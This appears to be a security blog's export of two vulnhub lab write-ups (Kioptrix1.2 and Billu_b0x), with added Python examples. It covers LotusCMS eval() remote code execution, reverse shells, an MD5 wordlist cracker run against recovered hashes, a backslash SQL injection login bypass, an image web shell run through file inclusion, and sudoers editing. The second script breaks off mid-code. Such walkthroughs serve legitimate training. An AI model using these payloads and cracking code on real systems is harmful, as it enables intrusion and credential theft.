<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>Kioptrix1.2</title>
<link href="/2023/05/12/Kioptrix1.2/"/>
<url>/2023/05/12/Kioptrix1.2/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="Information gathering"></a>Information gathering</h2><h3 id="nmap端口扫描"><a href="#nmap端口扫描" class="headerlink" title="nmap port scan"></a>nmap port scan</h3><p><img src="/2023/05/12/Kioptrix1.2/image-20230512204421057.png" alt="image-20230512204421057"></p><p>Ports 22 and 80 are open.</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="Directory scan"></a>Directory scan</h3><p><img src="/2023/05/12/Kioptrix1.2/image-20230512204813358.png" alt="image-20230512204813358"></p><h2 id="web渗透"><a href="#web渗透" class="headerlink" title="Web exploitation"></a>Web exploitation</h2><p><img src="/2023/05/12/Kioptrix1.2/image-20230512204826533.png" alt="image-20230512204826533"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512205523259.png" alt="image-20230512205523259"></p><p>The site is identified as LotusCMS.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512205538590.png" alt="image-20230512205538590"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512210624840.png" alt="image-20230512210624840"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512210645034.png" alt="image-20230512210645034"></p><p>Searching searchsploit for LotusCMS turns up only XSS and CSRF entries, which are hard to turn into a foothold, so a web search for other exploitation material was done instead. It led to the following article: <a href="https://vk9-sec.com/lotuscms-3-0-eval-remote-command-execution/">lotuscms-3-0-eval-remote-command-execution</a> (the CMS hands a request parameter to PHP <code>eval()</code>, which is what the article abuses).</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512213721703.png" alt="image-20230512213721703"></p><p>RCE confirmed: /etc/passwd is read through the injected command.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512214326100.png" alt="image-20230512214326100"></p><p>Next, run a reverse shell through the same injection.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512214236061.png" alt="image-20230512214236061"></p><p>The reverse connection succeeds.</p><h2 id="提权"><a href="#提权" class="headerlink" title="Privilege escalation"></a>Privilege escalation</h2><p>A database configuration file is found that holds the DB credentials: root/fuckeyou.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222130046.png" alt="image-20230512222130046"></p><p>Log in to the database and look at the account tables.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222227494.png" alt="image-20230512222227494"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222302549.png" alt="image-20230512222302549"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512222327552.png" alt="image-20230512222327552"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512223148032.png" alt="image-20230512223148032"></p><p>This gives the CMS back-end admin account admin/n0t7t1k4, which is of little use for privilege escalation.</p><p>More useful are the system usernames and their password hashes stored in the same database:</p><p>dreg/0d3eccfb887aabd50f243b3f155c0f85</p><p>loneferret/5badcaf789d3d1d09794d8f021f40f0e</p><p>Both users exist in /etc/passwd.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512223336952.png" alt="image-20230512223336952"></p><p>The hashes are unsalted MD5, so crack them with john in raw-md5 mode (one hash per guess, no salt and no work factor to slow the attack down):</p><p><code>john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt passwd</code></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512223703622.png" alt="image-20230512223703622"></p><p>Log in over SSH with the recovered password.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230512224227780.png" alt="image-20230512224227780"></p><h2 id="进一步提权"><a href="#进一步提权" class="headerlink" title="Further privilege escalation"></a>Further privilege escalation</h2><p>The CompanyPolicy.README file says that ht is the file editor to use.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230513220350791.png" alt="image-20230513220350791"></p><p><code>sudo -l</code> shows that ht may be run as root. An editor running as root can rewrite any root-owned file, so open /etc/sudoers with it and add a line granting the current user the right to run /bin/bash; that completes the escalation.</p><p><img src="/2023/05/12/Kioptrix1.2/image-20230513220901613.png" alt="image-20230513220901613"></p><p><img src="/2023/05/12/Kioptrix1.2/image-20230513220940228.png" alt="image-20230513220940228"></p>]]></content>
<tags>
<tag> vulnhub target machine </tag>
</tags>
</entry>
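<![CDATA[
Worked example added to this write-up (not the author's code, and not john): the offline attack that the john command above performs, done by hand against the two hashes quoted in the post plus a constructed third one. The wordlist, the leet table and the suffix rules are constructed for the example; the script reads no files and runs offline.

```python
"""Offline wordlist attack on unsalted MD5 password hashes.

Added example for this write-up; it is not code from the post or from john.
It does, in miniature, what "john --format=raw-md5 --wordlist=..." does with
the hashes pulled from the LotusCMS database: hash each candidate word (and a
few john-style mangled variants of it) and look the digest up in the target
set.  The wordlist and the "demo" target are constructed for the example; the
other two hashes are the ones quoted in the write-up.
"""
import hashlib
import itertools

# Targets as user -> hex MD5.  "demo" is a constructed entry whose plaintext
# ("Kioptrix1") the toy wordlist can reach; the other two are from the post.
TARGETS = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
    "demo": hashlib.md5(b"Kioptrix1").hexdigest(),
}

# Constructed stand-in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["password", "letmein", "kioptrix", "lotus", "admin"]

# A small leet-speak substitution table, similar in spirit to john's rules.
LEET = str.maketrans({"a": "4", "e": "3", "i": "1", "o": "0", "s": "5"})


def mangle(word):
    """Yield the base word and a handful of rule-based variants of it."""
    bases = sorted({word, word.capitalize(), word.upper(), word.translate(LEET)})
    for base in bases:
        yield base
        # Append 0..99 and two common suffixes, e.g. "Kioptrix1", "admin123".
        for suffix in itertools.chain(map(str, range(100)), ("!", "123")):
            yield base + suffix


def crack(targets, wordlist):
    """Return {user: plaintext} for every target hash reached by the wordlist.

    The hashes are unsalted, so one MD5 per candidate tests it against every
    user at once: invert the target map and do a dict lookup per digest.
    """
    by_hash = {}
    for user, digest in targets.items():
        by_hash.setdefault(digest.lower(), []).append(user)
    found = {}
    for word in wordlist:
        for candidate in mangle(word):
            digest = hashlib.md5(candidate.encode("utf-8")).hexdigest()
            for user in by_hash.get(digest, ()):
                found[user] = candidate
        if len(found) == len(targets):
            break
    return found


if __name__ == "__main__":
    # With the toy wordlist only "demo" is recovered; rockyou.txt is what
    # reaches the two hashes from the post, as the write-up's john run shows.
    for user, plaintext in crack(TARGETS, WORDLIST).items():
        print(f"{user}:{plaintext}")
```

The inverted-map lookup is the reason a salt matters: with per-user salts every candidate would have to be hashed once per user, and with a slow hash (bcrypt, scrypt, Argon2) each of those hashes would cost milliseconds instead of nanoseconds.
]]>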
<entry>
<title>Billu_b0x</title>
<link href="/2023/05/10/Billu_b0x/"/>
<url>/2023/05/10/Billu_b0x/</url>
<content type="html"><![CDATA[<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="Information gathering"></a>Information gathering</h2><h3 id="nnap"><a href="#nnap" class="headerlink" title="nmap"></a>nmap</h3><p><img src="/2023/05/10/Billu_b0x/image-20230509114020823.png" alt="image-20230509114020823"></p><p>The target's IP address is 192.168.37.130; ports 22 and 80 are open.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509114033119.png" alt="image-20230509114033119"></p><p><img src="/2023/05/10/Billu_b0x/image-20230509114045216.png" alt="image-20230509114045216"></p><p>nmap's built-in vulnerability scripts report a few sensitive paths.</p><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="Directory scan"></a>Directory scan</h3><p><img src="/2023/05/10/Billu_b0x/image-20230509114103206.png" alt="image-20230509114103206"></p><p>add.php is a file-upload form.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509115625059.png" alt="image-20230509115625059"></p><p>test.php asks for a <code>file</code> parameter, which suggests a file inclusion or at least an arbitrary file read.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509120148621.png" alt="image-20230509120148621"></p><h2 id="WEB渗透"><a href="#WEB渗透" class="headerlink" title="Web exploitation"></a>Web exploitation</h2><p>Passing the parameter with GET does nothing, so try POST.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509120206432.png" alt="image-20230509120206432"></p><p>That works: /etc/passwd comes back.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509120131075.png" alt="image-20230509120131075"></p><p>index.php taunts about SQL injection and add.php has a file upload, so pull both sources through the same file read and audit them for the injection and upload flaws.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#curl -X POST --data "file=index.php" http://192.168.37.130/test.php</span></span><br><span class="line"><span class="comment">#index.php</span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">'c.php'</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'head.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(@<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]!=<span 
class="literal">true</span>)</span><br><span class="line">{</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]=<span class="string">''</span>;</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]==<span class="literal">true</span> && <span class="variable">$_SESSION</span>[<span class="string">'admin'</span>]!=<span class="string">''</span>)</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"you are logged in :)"</span>;</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: panel.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<div align=center style="margin:30px 0px 0px 0px;"></span></span><br><span class="line"><span class="string"><font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> </span></span><br><span class="line"><span class="string"><br><br></span></span><br><span class="line"><span class="string">Show me your SQLI skills <br></span></span><br><span class="line"><span class="string"><form method=post></span></span><br><span class="line"><span class="string">Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br></span></span><br><span class="line"><span class="string"><input type=submit name=login value="let\'s login">'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span 
class="variable">$_POST</span>[<span class="string">'login'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="variable">$uname</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'\''</span>,<span class="string">''</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">'un'</span>]));</span><br><span class="line"> <span class="variable">$pass</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'\''</span>,<span class="string">''</span>,<span class="title function_ invoke__">urldecode</span>(<span class="variable">$_POST</span>[<span class="string">'ps'</span>]));</span><br><span class="line"> <span class="variable">$run</span>=<span class="string">'select * from auth where pass=\''</span>.<span class="variable">$pass</span>.<span class="string">'\' and uname=\''</span>.<span class="variable">$uname</span>.<span class="string">'\''</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$run</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">mysqli_num_rows</span>(<span class="variable">$result</span>) > <span class="number">0</span>) {</span><br><span class="line"></span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_assoc</span>(<span class="variable">$result</span>);</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"You are allowed<br>"</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]=<span class="literal">true</span>;</span><br><span class="line"> <span class="variable">$_SESSION</span>[<span class="string">'admin'</span>]=<span 
class="variable">$row</span>[<span class="string">'username'</span>];</span><br><span class="line"> </span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: panel.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<script>alert('Try again');</script>"</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> "</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br><span class="line">select * <span class="keyword">from</span> auth where pass=<span class="string">''</span>.<span class="variable">$pass</span>.<span class="string">''</span> <span class="keyword">and</span> uname=<span class="string">''</span>.<span class="variable">$uname</span>.<span class="string">''</span></span><br></pre></td></tr></table></figure><p>After a successful login the page redirects to panel.php.</p><p>The query is <code>select * from auth where pass='password' and uname='admin'</code>; <code>str_replace</code> strips single quotes from both inputs, but nothing is done about backslashes.</p><p>A payload of <code>or 1=1 --\</code> in both fields therefore bypasses the filter; the filled-in SQL is:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from auth where pass='or 1=1 --\' and uname='or 1=1 --\'</span><br></pre></td></tr></table></figure><p>What makes this work is the trailing backslash in the <code>pass</code> value: MySQL reads <code>\'</code> as an escaped quote, so the <code>pass</code> literal does not end where the application intended but runs on through <code> and uname=</code> up to the opening quote of the <code>uname</code> value. Everything after that point in the <code>uname</code> value is parsed as SQL, and <code>or 1=1</code> makes the WHERE clause true for every row, so the first user in <code>auth</code> is logged in. Two practical notes: MySQL only treats <code>--</code> as a comment when it is followed by whitespace, so write it as <code>-- -</code> if the server complains about the trailing characters; and the minimal form of the same trick, read straight off the query, is a lone <code>\</code> as <code>pass</code> with <code> or 1=1 -- -</code> as <code>uname</code>.</p><p>Login succeeds.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509153246875.png" alt="image-20230509153246875"></p><p>panel.php carries the same file upload as add.php. Use the file read to fetch its source:</p><figure class="highlight 
php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span 
class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">'c.php'</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'head2.php'</span>);</span><br><span class="line"><span class="keyword">if</span>(@<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]!=<span class="literal">true</span> )</span><br><span class="line">{</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line"> <span 
class="keyword">exit</span>();</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"Welcome to billu b0x "</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>'</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'lg'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">'logged'</span>]);</span><br><span class="line"> <span class="keyword">unset</span>(<span class="variable">$_SESSION</span>[<span class="string">'admin'</span>]);</span><br><span class="line"> <span class="title function_ invoke__">header</span>(<span class="string">'Location: index.php'</span>, <span class="literal">true</span>, <span class="number">302</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<hr><br>'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<form method=post></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"><select name=load></span></span><br><span class="line"><span class="string"> <option value="show">Show Users</option></span></span><br><span class="line"><span class="string"> <option value="add">Add User</option></span></span><br><span class="line"><span class="string"></select> </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> &nbsp<input type=submit 
name=continue value="continue"></form><br><br>'</span>;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'continue'</span>]))</span><br><span class="line">{</span><br><span class="line"> <span class="variable">$dir</span>=<span class="title function_ invoke__">getcwd</span>();</span><br><span class="line"> <span class="variable">$choice</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">'./'</span>,<span class="string">''</span>,<span class="variable">$_POST</span>[<span class="string">'load'</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$choice</span>===<span class="string">'add'</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">'/'</span>.<span class="variable">$choice</span>.<span class="string">'.php'</span>);</span><br><span class="line"> <span class="keyword">die</span>();</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$choice</span>===<span class="string">'show'</span>)</span><br><span class="line"> {</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">'/'</span>.<span class="variable">$choice</span>.<span class="string">'.php'</span>);</span><br><span class="line"> <span class="keyword">die</span>();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">include</span>(<span class="variable">$dir</span>.<span class="string">'/'</span>.<span class="variable">$_POST</span>[<span 
class="string">'load'</span>]);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'upload'</span>]))</span><br><span class="line">{</span><br><span class="line"></span><br><span class="line"> <span class="variable">$name</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$address</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">'address'</span>]);</span><br><span class="line"> <span class="variable">$id</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_POST</span>[<span class="string">'id'</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>]))</span><br><span class="line"> {</span><br><span class="line"> <span class="variable">$iname</span>=<span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$conn</span>,<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$r</span>=<span class="title function_ invoke__">pathinfo</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>],PATHINFO_EXTENSION);</span><br><span 
class="line"> <span class="variable">$image</span>=<span class="keyword">array</span>(<span class="string">'jpeg'</span>,<span class="string">'jpg'</span>,<span class="string">'gif'</span>,<span class="string">'png'</span>);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">in_array</span>(<span class="variable">$r</span>,<span class="variable">$image</span>))</span><br><span class="line"> {</span><br><span class="line"> <span class="variable">$finfo</span> = @<span class="keyword">new</span> <span class="title function_ invoke__">finfo</span>(FILEINFO_MIME); </span><br><span class="line"> <span class="variable">$filetype</span> = @<span class="variable">$finfo</span>-><span class="title function_ invoke__">file</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'tmp_name'</span>]);</span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/image\/jpeg/'</span>,<span class="variable">$filetype</span> ) || <span class="title function_ invoke__">preg_match</span>(<span class="string">'/image\/png/'</span>,<span class="variable">$filetype</span> ) || <span class="title function_ invoke__">preg_match</span>(<span class="string">'/image\/gif/'</span>,<span class="variable">$filetype</span> ))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'tmp_name'</span>], <span class="string">'uploaded_images/'</span>.<span class="variable">$_FILES</span>[<span class="string">'image'</span>][<span class="string">'name'</span>]))</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Uploaded successfully "</span>;</span><br><span 
class="line"> <span class="variable">$update</span>=<span class="string">'insert into users(name,address,image,id) values(\''</span>.<span class="variable">$name</span>.<span class="string">'\',\''</span>.<span class="variable">$address</span>.<span class="string">'\',\''</span>.<span class="variable">$iname</span>.<span class="string">'\', \''</span>.<span class="variable">$id</span>.<span class="string">'\')'</span>; </span><br><span class="line"> <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$conn</span>, <span class="variable">$update</span>);</span><br><span class="line"> </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>i told you dear, only png,jpg and gif file are allowed"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br>only png,jpg and gif file are allowed"</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>From the code, uploads are saved under uploaded_images/ with their original file name. The upload performs two checks: the extension (whatever follows the last dot, via <code>pathinfo</code>) must be jpeg, jpg, gif or png, and <code>finfo</code> must sniff the content as an image. Both are satisfied by a real image that has PHP appended to or inserted into it, because finfo only looks at the leading magic bytes.</p><p>The same script also has an arbitrary file inclusion through the <code>load</code> parameter: when <code>load</code> is neither <code>add</code> nor <code>show</code>, the else branch runs <code>include($dir.'/'.$_POST['load'])</code> on the raw POST value, and the <code>str_replace('./','',...)</code> is applied only to <code>$choice</code>, which that branch never uses. Because the uploaded file is reached through <code>include()</code>, its extension is irrelevant: PHP executes any PHP open-tag block it finds inside it.</p><img src="/2023/05/10/Billu_b0x/image-20230509235251300.png" alt="image-20230509235251300" style="zoom:60%;"><p>Upload a plain jpg first and confirm it is reachable.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509153813307.png" alt="image-20230509153813307"></p><p>Then use Burp Suite to modify the image body so that it carries PHP (an image web shell), upload it, and set <code>load</code> to the uploaded path to see whether it is included.</p><p><img src="/2023/05/10/Billu_b0x/image-20230509235734366.png" alt="image-20230509235734366"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510000502176.png" 
alt="image-20230510000502176"></p><p>Command execution works. Re-upload the file with a reverse-shell one-liner in place of the test command and catch the connection.</p><p><img src="/2023/05/10/Billu_b0x/image-20230510001034659.png" alt="image-20230510001034659"></p><h2 id="提权"><a href="#提权" class="headerlink" title="Privilege escalation"></a>Privilege escalation</h2><h3 id="方法一"><a href="#方法一" class="headerlink" title="Method 1"></a>Method 1</h3><p>Under /phpmy the phpMyAdmin configuration file is found; it contains the credentials root/roottoor. That is the MySQL root account, so the obvious check is whether the same password is reused for the system root account over SSH.</p><p><img src="/2023/05/10/Billu_b0x/image-20230510001413130.png" alt="image-20230510001413130"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510001530836.png" alt="image-20230510001530836"></p><p>It is: the SSH login as root succeeds. Password reuse between a database account and the OS account is the whole escalation here.</p><h3 id="方法二"><a href="#方法二" class="headerlink" title="Method 2"></a>Method 2</h3><p>Kernel exploit: identify the distribution and kernel release, then look up a matching local privilege-escalation exploit and run it on the target.</p><p><img src="/2023/05/10/Billu_b0x/image-20230510002322291.png" alt="image-20230510002322291"></p><p><code>lsb_release -a</code></p><p><img src="/2023/05/10/Billu_b0x/image-20230510002401112.png" alt="image-20230510002401112"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510002419385.png" alt="image-20230510002419385"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510002524934.png" alt="image-20230510002524934"></p><p><img src="/2023/05/10/Billu_b0x/image-20230510002942842.png" alt="image-20230510002942842"></p>]]></content>
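<![CDATA[
Worked example added to this write-up, not code from the Billu_b0x image: the index.php query builder re-created in Python, a small emulation of MySQL's string-literal lexing written for this example, and the parameterised fix. It uses the minimal form of the backslash trick implied by the query in the analysis above (pass set to a lone backslash, uname set to " or 1=1 -- -"); the auth table is a constructed in-memory SQLite stand-in.

```python
"""Why a trailing backslash defeats index.php's quote-stripping filter.

Added example for this write-up; it is not code from the Billu_b0x image.
build_query() reproduces the string handling of index.php (urldecode, strip
single quotes, concatenate).  mysql_lex() is a small emulation of how MySQL
tokenises single-quoted literals (backslash escapes, doubled quotes, "-- "
and "#" comments), written here so the effect can be inspected without a
MySQL server; executed_shape() shows which parts of the statement actually
reach the planner.  login_fixed() is the repair: a parameterised query
against a constructed in-memory SQLite table.
"""
import sqlite3
from urllib.parse import unquote


def build_query(un, ps):
    """Mirror index.php: str_replace("'", "", urldecode(x)) on both inputs."""
    uname = unquote(un).replace("'", "")
    passwd = unquote(ps).replace("'", "")
    return "select * from auth where pass='" + passwd + "' and uname='" + uname + "'"


def mysql_lex(sql):
    """Split sql into (kind, text) pieces: 'sql', 'str', 'comment' or
    'unterminated'.  Inside a literal a backslash escapes the next character
    and '' is one literal quote (MySQL defaults, NO_BACKSLASH_ESCAPES off).
    A '--' starts a comment only when it is followed by whitespace."""
    pieces, buf, i, n = [], [], 0, len(sql)
    while i < n:
        c = sql[i]
        if c == "#" or (sql.startswith("--", i) and i + 2 < n and sql[i + 2].isspace()):
            if buf:
                pieces.append(("sql", "".join(buf)))
            pieces.append(("comment", sql[i:]))
            return pieces
        if c != "'":
            buf.append(c)
            i += 1
            continue
        if buf:
            pieces.append(("sql", "".join(buf)))
            buf = []
        i += 1
        lit, closed = [], False
        while i < n:
            c = sql[i]
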